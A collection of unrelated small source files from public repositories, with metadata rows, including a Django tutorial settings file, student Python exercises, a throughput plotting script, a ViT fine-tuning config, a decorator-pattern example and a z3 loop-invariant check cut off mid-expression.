6581839ee0756f4cfadb872de1355049dea9b1b3 | 2b4513065b8a47628880eb266a3b2816d5fa236d | /mysite/settings.py | 0b16301e1e9fa2f31051399c83f0167574776a9d | [] | no_license | Mirnal1409/my-first-blog | 0efe0c1cdbbb36b34a245a097c8d3338c7730d29 | d28b40a51133dc3651e2bb6cfbf9405022f8efde | refs/heads/master | 2021-01-25T11:27:21.302289 | 2018-03-01T07:09:56 | 2018-03-01T07:09:56 | 123,397,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,197 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.11.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^7k2&r97=5z)(anoo0f4_z8)e!pt5mncw1d(07-eri5z+5jxap'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', '.pythonanywhere.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
| [
"mirnal1409@gmail.com"
] | mirnal1409@gmail.com |
7f77a003252c80a23d1ad91c4ca9b0e7c220e44a | dea919cb602c36111acafe27d9d264685d7cc793 | /10.py | c1aee6b453192e044a22769c04853b3952148d15 | [] | no_license | nikitos219745/Kolokviym | f1a781d0177f64986fddbe7f40447234a8beb41f | 1a8d312a129416b8462cd5c05c27ce975c4009fb | refs/heads/master | 2022-04-27T17:53:27.270463 | 2020-04-23T20:16:00 | 2020-04-23T20:16:00 | 258,319,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,129 | py | #Чекалін Нікіта Валерійович 1 курс Завдання 10
#Дані про температуру повітря за декаду листопада зберігаються в масиві.
#Визначити, скільки разів температура опускалася нижче -10 градусів.
import numpy as np
while True:
a = np.zeros(10, dtype=int)
count = 0#лічильник
for i in range(len(a)):
a[i] = int(input("Введіть температуру: "))#введення данних
for i in range(len(a)):#умова для визнач к-ль опусканння темп
if a[i] <= -10:
count += 1#лічильник
print("Масив ",a)
print("Кількість раз, коли температура була ниже -10: ",count)
print("Щоб запустити програму спочатку натисніть 1. Для виходу будь яке інше значення")
choise = input()
if choise == "1":
continue
else:
break
| [
"noreply@github.com"
] | nikitos219745.noreply@github.com |
fd8de2697b4189f330512629ee7301296a8a337b | 4dfa10de8e96fa8f11129d8865e8b0dda0878d20 | /haptic_bridge/build/devel/lib/python2.7/dist-packages/haptic_bridge/srv/__init__.py | ab0307cc7c1767177bffd7e83f168614ee03f7e9 | [] | no_license | tjh-flash/WokeRepository | 8d137f252cde4d849ad7095b9eee4c9d16a3fb41 | d1bc8498d27887e597f9539901b8fd8ecee5e165 | refs/heads/master | 2023-03-27T07:39:53.815869 | 2021-03-31T07:42:02 | 2021-03-31T07:42:02 | 353,265,934 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 111 | py | from ._CloseDevice import *
from ._OpenDevice import *
from ._StartControl import *
from ._SwitchAxis import *
| [
"fshs@163.com"
] | fshs@163.com |
d9768ff6fbed6edd8e2242aa40f624d70eba0c44 | eae0bbb85494d04d87d69cb2cbde9c0b7b7c0ed1 | /ishare/userprofile/admin.py | b88e8a56c13b87c4fb6f828a5815cbe84ef83692 | [] | no_license | owenmead/ishare | 1457a9b2b998888bad44294ab3be5c285ff28a68 | 17e857da490d0a556bdf0337d2fc7fed46a35a4f | refs/heads/master | 2016-09-06T21:35:28.205692 | 2011-02-06T18:05:44 | 2011-02-06T18:05:44 | 1,286,076 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from django.contrib import admin
from ishare.userprofile.models import UserProfile
admin.site.register(UserProfile) | [
"owenmead@gmail.com"
] | owenmead@gmail.com |
a24baa4d6bc822d4b1281390833220aec3d84176 | 2aa47f47fb81798afdf41437844cbbea8e9de66c | /02pythonBase/day10/res/exercise/mysum.py | f01610139cf297dab58d87dd27cd73d8d71c2bb2 | [] | no_license | nykh2010/python_note | 83f2eb8979f2fb25b4845faa313dbd6b90b36f40 | 5e7877c9f7bf29969072f05b98277ef3ba090969 | refs/heads/master | 2020-04-27T23:10:16.578094 | 2019-03-23T02:43:14 | 2019-03-23T02:43:14 | 174,765,151 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 541 | py | # 练习:
# 写一个函数 mysum, 可以传入任意个实参的数字,
# 此函数返回所有实参的和:
# def mysum(*args):
# ... # <<<--- 此处需要自己实现
# print(mysum(1, 2, 3, 4)) # 10
# print(mysum(1, 2, 3, 4, 5)) # 15
def mysum(*args):
print("第11行的mysum被调用!")
s = 0 # 用于累加和
for x in args:
s += x
return s
def mysum(*args):
print("第17行的mysum被调用!")
return sum(args)
print(mysum(1, 2, 3, 4)) # 10
print(mysum(1, 2, 3, 4, 5)) # 15
| [
"xulingfeng@boe.com.cn"
] | xulingfeng@boe.com.cn |
6b3412794702ca46f4ce306d7d9ecffcb3d07cf5 | 3af673d901f44dbabe6b223593270ac1334ef4b3 | /자료구조/day01/ClassTask.py | b02a40a4c624de3d893c21cda8b106d18813c4a1 | [] | no_license | ghldbssla/Python | 612f0a033f92952d68a805219c44b9a1e2df1a92 | 4aeae0f95625512648cd16971fd8e0c19bb219b4 | refs/heads/master | 2023-03-10T16:59:48.989666 | 2021-02-21T09:10:19 | 2021-02-21T09:10:19 | 328,637,426 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 743 | py | #ClassTask.py
class User:
userid=''
userpw=''
username=''
usernum=1
def __init__(self, userid, userpw,username):
#User.usernum:클래스변수
self.usernum=User.usernum
User.usernum+=1
self.userid=userid
self.userpw=userpw
self.username=username
#return한 문자열이 객체를 출력했을 때 나온다.
def __repr__(self):
return str(self.usernum)+"번 회원 : "+self.userid+"("+self.username+")"
user1 = User('apple','1234','김사과')
user2 = User('banana','1234','반하나')
#원래는 주소값으로 만들어져 있는 문자열로 바뀌는 __repr__ 메소드
#재정의를 하면 바꿀수 있다. 오버라이딩!
print(user1)
print(user2)
| [
"ghldbssla1997@gmil.com"
] | ghldbssla1997@gmil.com |
d935440f0a1a0145827789b26ea165b74904196d | 79fb9dc443b9457bd5fc79940dbc042596b32a9e | /ex31.py | 4cc36fc7092dd45123a3fb876e014cc735fc5d94 | [] | no_license | davray/lpthw-exercises | c73e9d9d8211e2694a057dd69773fab9cfceb447 | 3fdc32672039ef7a65d36a3196aa4d2c48249e3c | refs/heads/master | 2021-01-12T13:07:02.323703 | 2016-11-09T07:12:30 | 2016-11-09T07:12:30 | 70,118,579 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,052 | py | print '''
You enter a dark room with two doors.
Do you go through door #1 or door #2?'''
door = raw_input("> ")
if door == "1":
print "There's a giant bear here eating cheese cake. What do you do?"
print "1. Take the cake."
print "2. Scream at the bear."
bear = raw_input("> ")
if bear == "1":
print "The bear eats your face off. Good job."
elif bear == "2":
print "The bear eats your legs off. Good job."
else:
print "Well, doing %s is probably better. Bear runs away." % bear
elif door == "2":
print "You star into the endless abyss at Cthulu's retina."
print "1. Blueberries."
print "2. Yellow jacket clothespins."
print "3. Understand revolvers yelling melodies."
insanity = raw_input("> ")
if insanity == "1" or insanity == "2":
print "Your body survives powered by a mind of jello. Good job."
else:
print "The insanity rots your eyes into a pool of much. Good job."
else:
print "You stumble around and fall on a knife and die. Good job."
| [
"davduaray@gmail.com"
] | davduaray@gmail.com |
3d4faadfd14bafd5da0fe8ad3de8abae6921eadf | 4202f125131f96e67c9efce0759266838aace064 | /Week 6 - Plots/wget-visualizer/run-001-20190410/wget-visual.py | 8494de4e80b80cca35811fc9d67ef36678da2111 | [] | no_license | emregunaydinn/METU-BA4318-Fall2019 | de163ac1e853a19136f3c9ab23fd06581c75b150 | f2434d83eb5e9ad7684f7e83fc39bc7d324f68ab | refs/heads/master | 2022-03-28T06:54:56.766262 | 2020-01-19T15:24:11 | 2020-01-19T15:24:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,149 | py | import warnings
import pandas as pd
import numpy as np
from numpy import convolve
import matplotlib.pyplot as plt
from matplotlib import figure
def convert_number_to_KMG(x):
if x < 1000:
x = round(x,-1)
return str(x)
elif x < 1000000:
x = round(x,-2) / 1000
return str(x)+"K"
elif x < 1000000000:
x = round(x,-5) / 1000000
return str(x)+"M"
else:
x = round(x,-8) / 1000000000
return str(x)+"G"
def convert_KMG_to_number(x):
total_stars = 0
if "K" in x:
if len(x) > 1:
total_stars = float(x.replace('K', '')) * 1000 # convert K to a thousand
elif "M" in x:
if len(x) > 1:
total_stars = float(x.replace('M', '')) * 1000000 # convert M to a million
elif "G" in x:
total_stars = float(x.replace('G', '')) * 1000000000 # convert G to a Billion
else:
total_stars = float(x) # Less than 1000
return int(total_stars)
def convert_speed(arr):
newdata = []
for entry in arr:
newpoint = convert_KMG_to_number( entry.replace(",", ".") )
newdata.append(newpoint)
return np.array(newdata)
def load_files(filenames, cols):
frames = {} #dictionary
for filename in filenames:
df = pd.read_csv(filename, skiprows=5, skipfooter=2, header=None, delim_whitespace=True, error_bad_lines=False, usecols = cols)
df = df.dropna(how='any')
#print(filename)
# print(df.tail())
key = filename.split(".")[0]
df.columns = [key]
frames[key] = df
return frames
def clean_extreme(values, target=5):
ratio = 10 * target
while ratio > target:
mean = np.mean(values)
max = np.amax(values)
ratio = max / mean
if ratio > target:
index = np.argmax(values)
# smooth at the index
values[index] = (values[index] + mean ) / 2
return values
def fabric_softener(values, window=50):
# first apply moving average smoothing
clean = values[~np.isnan(values)] # remove nan values
weights = np.repeat(1.0, window) / window
ma = np.convolve(clean, weights, 'valid') # moving average
mean = np.mean(ma)
# clear nan values
# for i in range(0, len(ma)):
# if np.isnan(ma[i]).all():
# ma[i] = mean
ma = clean_extreme(ma)
return ma
def create_plots(frames, fig):
ymax = 0
colors_cubic = ['#00FF00', '#00DD11', '#00AA22'] # RRGGBB, greenish colors for cubic
colors_lead = ['#FF0000', '#DD0011', '#AA0022'] ## RRGGBB, reddish colors for lead
next_cubic = 0
next_lead = 0
next_plot = 1 # should start with 1
for key, frame in frames.items():
df = frames[key]
# set dataframe size
array = np.array(df[key].values)
array = convert_speed(array)
ym = np.mean(array)
w = 50
if "cubic" in key:
w = 80
elif "lead" in key:
w = 80
array = fabric_softener(array, window=w)
size = len(array)
y_mean = [ym]*len(array)
ymd = np.median(array)
y_median = [ymd] * len(array)
x_axis = range(0,size)
local_ymax = np.amax(array)
#local_ymean = np.mean(array)
if local_ymax > ymax:
ymax = local_ymax
# Select line style, solid for cubic, dashed for lead
lstyle = 'solid'
if "lead" in key:
lstyle='dashed'
coldata = colors_lead[0]
colmean = colors_lead[1]
colmedian = colors_lead[2]
if "cubic" in key:
lstyle='solid'
coldata = colors_cubic[0]
colmean = colors_cubic[1]
colmedian = colors_cubic[2]
# create subplot
axi = fig.add_subplot(3, 2, next_plot) # rows, cols, plot number
axi.plot(x_axis, array, color=coldata, linestyle=lstyle, label=key)
# add mean line
lbl = "Sistemlerde raporlanan ortalama hız=" + convert_number_to_KMG(ym)
axi.plot(x_axis, y_mean, color=colmean, linestyle="-.", label=lbl)
# add median line
lbl = "Gerçekte hissedilen ortanca hız=" + convert_number_to_KMG(ymd)
axi.plot(x_axis, y_median, color=colmedian, linestyle=":", label=lbl)
# axi.set_xlabel('İndirilen parça')
ylim = 1.1 * local_ymax
axi.set_ylim(0, ylim)
axi.set_ylabel('Parçanın indirilme hızı')
axi.set_title(key)
axi.legend()
next_plot = next_plot + 1
return ymax
#All data series have been added to plot
warnings.filterwarnings("ignore")
names = ['astro-cubic.out', 'astro-lead.out',
'guppy-cubic.out', 'guppy-lead.out',
'interview-cubic.out', 'interview-lead.out']
needed = [7]
frames = load_files(filenames=names, cols=needed)
plt.style.use('seaborn-whitegrid')
fig = plt.figure()
ymax = create_plots(frames, fig)
# f, axarr = plt.subplots(6)
#for index in range(6):
# axarr[index].set_ylim(0, ymax)
plt.show()
# plt.savefig('the_best_plot.pdf')
| [
"blog1234@GITHUB"
] | blog1234@GITHUB |
40dfe239746f14da2cd97adf27df4e81ed29da65 | 4f7140c62cc649373379941224072c9e6b707ef7 | /examples/prompts/clock-input.py | fd1f8760ed2e77af6f65fbae97fa63ce949125fe | [
"BSD-3-Clause"
] | permissive | qianhaohu/python-prompt-toolkit | 03d282a0a6a258a08ef822bc342a6b7fb65667f7 | 237cf46ff50c8a689a72e3dfe664dfe69bffd245 | refs/heads/master | 2020-05-16T05:19:38.934218 | 2019-04-16T19:10:07 | 2019-04-16T19:40:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 607 | py | #!/usr/bin/env python
"""
Example of a 'dynamic' prompt. On that shows the current time in the prompt.
"""
from __future__ import unicode_literals
import datetime
from prompt_toolkit.shortcuts import prompt
def get_prompt():
" Tokens to be shown before the prompt. "
now = datetime.datetime.now()
return [
('bg:#008800 #ffffff', '%s:%s:%s' % (now.hour, now.minute, now.second)),
('bg:cornsilk fg:maroon', ' Enter something: ')
]
def main():
result = prompt(get_prompt, refresh_interval=.5)
print('You said: %s' % result)
if __name__ == '__main__':
main()
| [
"jonathan@slenders.be"
] | jonathan@slenders.be |
5d9c0e1d64a54205baad6cd4387d049d7075add4 | 96622790b66e45926b79bc524ec75a0f4d53a7eb | /src/misc-preprocessing-scripts/maeToPdb.py | 607322e4c183184fce0eb9365a2c80401d9cb81f | [] | no_license | akma327/GPCR-WaterDynamics | a8c2e13e18f953b6af66a3e669052cb3eacd346b | 685f4dea0605d65c003bf952afd964df6e605b06 | refs/heads/master | 2021-01-22T07:42:42.539496 | 2017-05-27T07:23:44 | 2017-05-27T07:23:44 | 92,574,339 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,514 | py | # Author: Anthony Kai Kwang Ma
# Email: akma327@stanford.edu
# maeToPdb.py
# MAE To PDB File Converter
# Usage:
# python maeToPdb.py <input path to mae> <output path for pdb> <optional pdb file name>
# <input path to mae> Provide the absolute path to the mae file name
# <output path for pdb> Provide the directory path to store the pdb
# <optional pdb file name> Default is to rename the pdb to the same prefix as mae, but user can specify new name
# Example:
#
import vmd, molecule
import sys
PROPER_USAGE_STR = """
# Usage:
# python maeToPdb.py <input path to mae> <output path for pdb> <optional pdb file name>
# <input path to mae> Provide the absolute path to the mae file name
# <output path for pdb> Provide the directory path to store the pdb
# <optional pdb file name> Default is to rename the pdb to the same prefix as mae, but user can specify new name
# Example:
# INPUT_MAE_PATH="/scratch/PI/rondror/DesRes-Simulations/ordered-from-DesRes/nature2013/DESRES-Trajectory_nature2013-AA-all/DESRES-Trajectory_nature2013-AA-58-all/nature2013-AA-58-all/nature2013-AA-58-all.mae"
# OUTPUT_PDB_PATH="/scratch/PI/rondror/akma327/noncovalent_Interaction_Scripts/DynamicInteractions/tools"
# PDB_FILE_NAME="nature2013-AA-58-new.pdb"
# python maeToPdb.py $INPUT_MAE_PATH $OINPUT_MAE_PATH="/scratch/PI/rondror/DesRes-Simulations/ordered-from-DesRes/nature2013/DESRES-Trajectory_nature2013-AA-all/DESRES-Trajectory_nature2013-AA-58-all/nature2013-AA-58-all/nature2013-AA-58-all.mae"
# OUTPUT_PDB_PATH="/scratch/PI/rondror/akma327/noncovalent_Interaction_Scripts/DynamicInteractions/tools"
# PDB_FILE_NAME="nature2013-AA-58-new.pdb"
# python maeToPdb.py $INPUT_MAE_PATH $OUTPUT_PDB_PATH $PDB_FILE_NAME UTPUT_PDB_PATH $PDB_FILE_NAME """
MIN_NUM_ARGS = 3
# import vmd, molecule
# input_mae_path= "nature2011-B-all.mae"
# output_pdb_file_path = "step5_assembly.pdb"
# molid = molecule.load('mae', input_mae_path)
# molecule.write(molid, 'pdb', output_pdb_file_path)
# import mdtraj as md
# t = md.load('step5_assembly.pdb')
def maeToPdb(input_mae_path, output_pdb_file_path):
molid = molecule.load('mae', input_mae_path)
molecule.write(molid, 'pdb', output_pdb_file_path)
print("Finished Conversion for: " + str(input_mae_path))
if __name__ == "__main__":
if(len(sys.argv) < MIN_NUM_ARGS):
print("Invalid Arguments")
print(PROPER_USAGE_STR)
exit(0)
input_mae_path = sys.argv[1]
output_pdb_path = sys.argv[2]
print(input_mae_path, output_pdb_path)
maeToPdb(input_mae_path, output_pdb_path)
| [
"akma327@stanford.edu"
] | akma327@stanford.edu |
76afa7bf1b600d48448d076af1549d5dee42b27e | 17017d64ba355c423ec146f8dcf2abe745803aac | /rest_api/global_utils.py | 58307a392dd4193c4457f4acd427f783e59cab78 | [
"Apache-2.0"
] | permissive | saikrishna9494/obsei | 1fc9869ef9b0dca2567918cc469e266fba937656 | 47d4716961d5b1429a964dbc9fc8fa241afac2d5 | refs/heads/master | 2023-02-17T12:37:44.757908 | 2021-01-11T22:58:01 | 2021-01-11T22:58:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,580 | py | import logging
from typing import Dict
from fastapi import APIRouter, FastAPI, HTTPException
from flask import Request
from starlette.middleware.cors import CORSMiddleware
from starlette.responses import JSONResponse
from obsei.sink.base_sink import BaseSink
from obsei.sink.dailyget_sink import DailyGetSink
from obsei.sink.elasticsearch_sink import ElasticSearchSink
from obsei.sink.http_sink import HttpSink
from obsei.sink.jira_sink import JiraSink
from obsei.source.base_source import BaseSource
from obsei.source.playstore_reviews import PlayStoreSource
from obsei.source.twitter_source import TwitterSource
logger = logging.getLogger(__name__)
source_map: Dict[str, BaseSource] = {
"Twitter": TwitterSource(),
"PlayStore": PlayStoreSource()
}
sink_map: Dict[str, BaseSink] = {
"Http": HttpSink(),
"Jira": JiraSink(),
"DailyGet": DailyGetSink(),
"Elasticsearch": ElasticSearchSink(),
}
router = APIRouter()
async def http_error_handler(_: Request, exc: HTTPException) -> JSONResponse:
return JSONResponse({"errors": [exc.detail]}, status_code=exc.status_code)
def get_application() -> FastAPI:
application = FastAPI(
title="Obsei-APIs",
debug=True,
version="0.1",
description="Observe, Segment and Inform"
)
application.add_middleware(
CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"],
)
application.add_exception_handler(HTTPException, http_error_handler)
application.include_router(router)
return application
| [
"pagaria.lalit@gmail.com"
] | pagaria.lalit@gmail.com |
0a69a74b8880af5c134087789b062ef0e4fa1361 | 2c36c1bbad8fa78ba23449d50961acbcc3860677 | /manage.py | aa6b62d482ebce0ff6cb50a2269e7722fbb85a05 | [] | no_license | pg999/umeed | eabb6fc706039d1da48ce4e4d38a91877f171c7a | 2bffaf9ef252d7c3712a3582f9e86c4a1c8d3d61 | refs/heads/master | 2020-12-31T00:30:05.922844 | 2017-04-01T23:44:06 | 2017-04-01T23:44:06 | 86,511,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 803 | py | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "umeed.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| [
"pramudgupta@gmail.com"
] | pramudgupta@gmail.com |
d6d93cb282a9b64ae57a7522d83152c22b1aae24 | 6814b9b28204fa58f77598d01c760ddeb4b66353 | /baselines/jft/experiments/jft300m_vit_base16_heteroscedastic_finetune_cifar.py | 8384bfa093ad4ce0435cbcdfa7302096e6fa5720 | [
"Apache-2.0"
] | permissive | qiao-maoying/uncertainty-baselines | a499951ea1450323e00fe03891ba8f781fe1cdc7 | 54dce3711b559ae3955a8a7d05c88eb982dea470 | refs/heads/main | 2023-07-17T23:17:10.867509 | 2021-08-18T20:32:11 | 2021-08-18T20:32:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,620 | py | # coding=utf-8
# Copyright 2021 The Uncertainty Baselines Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=line-too-long
r"""Finetune a ViT-B/16 heteroscedastic model on CIFAR-10.
"""
# pylint: enable=line-too-long
import ml_collections
# TODO(dusenberrymw): Open-source remaining imports.
def get_sweep(hyper):
return hyper.product([])
def get_config():
"""Config for training a patch-transformer on JFT."""
config = ml_collections.ConfigDict()
# Fine-tuning dataset
config.dataset = 'cifar10'
config.val_split = 'train[98%:]'
config.train_split = 'train[:98%]'
config.num_classes = 10
BATCH_SIZE = 512 # pylint: disable=invalid-name
config.batch_size = BATCH_SIZE
config.total_steps = 10_000
INPUT_RES = 384 # pylint: disable=invalid-name
pp_common = '|value_range(-1, 1)'
# pp_common += f'|onehot({config.num_classes})'
# To use ancestor 'smearing', use this line instead:
pp_common += f'|onehot({config.num_classes}, key="label", key_result="labels")' # pylint: disable=line-too-long
pp_common += '|keep("image", "labels")'
config.pp_train = f'decode|inception_crop({INPUT_RES})|flip_lr' + pp_common
config.pp_eval = f'decode|resize({INPUT_RES})' + pp_common
config.shuffle_buffer_size = 50_000 # Per host, so small-ish is ok.
config.log_training_steps = 10
config.log_eval_steps = 100
# NOTE: eval is very fast O(seconds) so it's fine to run it often.
config.checkpoint_steps = 1000
config.checkpoint_timeout = 1
config.prefetch_to_device = 2
config.trial = 0
# Model section
# pre-trained model ckpt file
# !!! The below section should be modified per experiment
config.model_init = '/path/to/pretrained_model_ckpt.npz'
# Model definition to be copied from the pre-training config
config.model = ml_collections.ConfigDict()
config.model.patches = ml_collections.ConfigDict()
config.model.patches.size = [16, 16]
config.model.hidden_size = 768
config.model.transformer = ml_collections.ConfigDict()
config.model.transformer.attention_dropout_rate = 0.
config.model.transformer.dropout_rate = 0.
config.model.transformer.mlp_dim = 3072
config.model.transformer.num_heads = 12
config.model.transformer.num_layers = 12
config.model.classifier = 'token' # Or 'gap'
# This is "no head" fine-tuning, which we use by default
config.model.representation_size = None
# # Heteroscedastic
config.model.multiclass = True
config.model.temperature = 3.0
config.model.mc_samples = 1000
config.model.num_factors = 3
config.model.param_efficient = True
config.model.return_locs = True # set True to fine-tune a homoscedastic model
# Optimizer section
config.optim_name = 'Momentum'
config.optim = ml_collections.ConfigDict()
config.grad_clip_norm = 1.0
config.weight_decay = None # No explicit weight decay
config.loss = 'softmax_xent' # or 'sigmoid_xent'
config.lr = ml_collections.ConfigDict()
config.lr.base = 0.001
config.lr.warmup_steps = 500
config.lr.decay_type = 'cosine'
config.lr.scale_with_batchsize = False
config.args = {}
return config
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
5cffb5a2fb9d408a8f4fe88b0e46d790428e9c92 | 1bde114a847c629701e3acd004be5788594e0ef1 | /Examples/Decorator/alldecorators/CoffeeShop.py | 9e4861b473c3803d1d2a0b2ad0b382e4cce35f7a | [] | no_license | BruceEckel/ThinkingInPython | 0b234cad088ee144bb8511e1e7db9fd5bba78877 | 76a1310deaa51e02e9f83ab74520b8269aac6fff | refs/heads/master | 2022-02-21T23:01:40.544505 | 2022-02-08T22:26:52 | 2022-02-08T22:26:52 | 97,673,620 | 106 | 33 | null | 2022-02-08T22:26:53 | 2017-07-19T04:43:50 | Python | UTF-8 | Python | false | false | 1,722 | py | # Decorator/alldecorators/CoffeeShop.py
# Coffee example using decorators
class DrinkComponent:
def getDescription(self):
return self.__class__.__name__
def getTotalCost(self):
return self.__class__.cost
class Mug(DrinkComponent):
cost = 0.0
class Decorator(DrinkComponent):
def __init__(self, drinkComponent):
self.component = drinkComponent
def getTotalCost(self):
return self.component.getTotalCost() + \
DrinkComponent.getTotalCost(self)
def getDescription(self):
return self.component.getDescription() + \
' ' + DrinkComponent.getDescription(self)
class Espresso(Decorator):
cost = 0.75
def __init__(self, drinkComponent):
Decorator.__init__(self, drinkComponent)
class Decaf(Decorator):
cost = 0.0
def __init__(self, drinkComponent):
Decorator.__init__(self, drinkComponent)
class FoamedMilk(Decorator):
cost = 0.25
def __init__(self, drinkComponent):
Decorator.__init__(self, drinkComponent)
class SteamedMilk(Decorator):
cost = 0.25
def __init__(self, drinkComponent):
Decorator.__init__(self, drinkComponent)
class Whipped(Decorator):
cost = 0.25
def __init__(self, drinkComponent):
Decorator.__init__(self, drinkComponent)
class Chocolate(Decorator):
cost = 0.25
def __init__(self, drinkComponent):
Decorator.__init__(self, drinkComponent)
cappuccino = Espresso(FoamedMilk(Mug()))
print(cappuccino.getDescription().strip() + \)
": $" + `cappuccino.getTotalCost()`
cafeMocha = Espresso(SteamedMilk(Chocolate(
Whipped(Decaf(Mug())))))
print(cafeMocha.getDescription().strip() + \)
": $" + `cafeMocha.getTotalCost()`
| [
"mindviewinc@gmail.com"
] | mindviewinc@gmail.com |
e83fa49521cb17a21319c4c22cda47db9118190a | ba1cc1f90570913b7ee128478cf38ab84e84ab4a | /manage.py | 9a6fa64800ceaa9d67992d74c534d8adddc70889 | [] | no_license | splendidbug/predict_flight_fare | a5406d3d244ffbfbd130ae56e9c370ead1141411 | 3ccdf79721efcdb64c644e193a0bb56a902ffccf | refs/heads/main | 2023-05-23T08:10:55.221448 | 2021-06-11T12:59:50 | 2021-06-11T12:59:50 | 328,111,693 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 678 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'flight_fare_prediction.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| [
"shreyasanother@gmail.com"
] | shreyasanother@gmail.com |
81be308241c8f04597fd75058567bc25aa622153 | 89c81953eb880ccf5e931af3395b1ed0b6c7db1d | /gcln_model/z3_checks/divbin_z3.py | 9d8a4705fedb8c62b6ac992945309c55ae8ae7b5 | [] | no_license | jyao15/G-CLN | 696ae44f12e2633ea53288a0eaac7111c20b8242 | 65bdb32c4bb9f0902c72cc7d048ab3d6b59c0739 | refs/heads/master | 2022-12-29T20:44:04.600400 | 2022-12-29T04:17:32 | 2022-12-29T04:17:32 | 265,091,891 | 10 | 10 | null | null | null | null | UTF-8 | Python | false | false | 2,942 | py | from z3 import *
import z3_checks.core
# import core
def get_checks(z3_vars, z3_var2s, loop_idx=2):
A, B, q, r, b = (z3_vars[v] for v in 'A B q r b'.split())
A2, B2, q2, r2, b2 = (z3_var2s[v] for v in 'A2 B2 q2 r2 b2'.split())
if loop_idx == 1:
lc = r >= b
pre = And(A > 0, B > 0, q == 0, r == A, b == B)
rec = And(b2 == 2*b, A2==A, B2==B, q2==q, r2==r)
post = None # TODO
# q = 0, A=r; b > 0; r>0
eq = And(q == 0, A==r)
ineq = And(b>0, r>0)
return lc, pre, rec, post, eq, ineq
elif loop_idx == 2:
lc = b != B
pre = And(q == 0, A == r, b > 0, r > 0, r < b)
rec = And(A2 == A, B2 == B, b2 == b/2, b == 2 * b2,
Or(And(r >= b2, q2 == 2 * q + 1, r2 == r - b2),
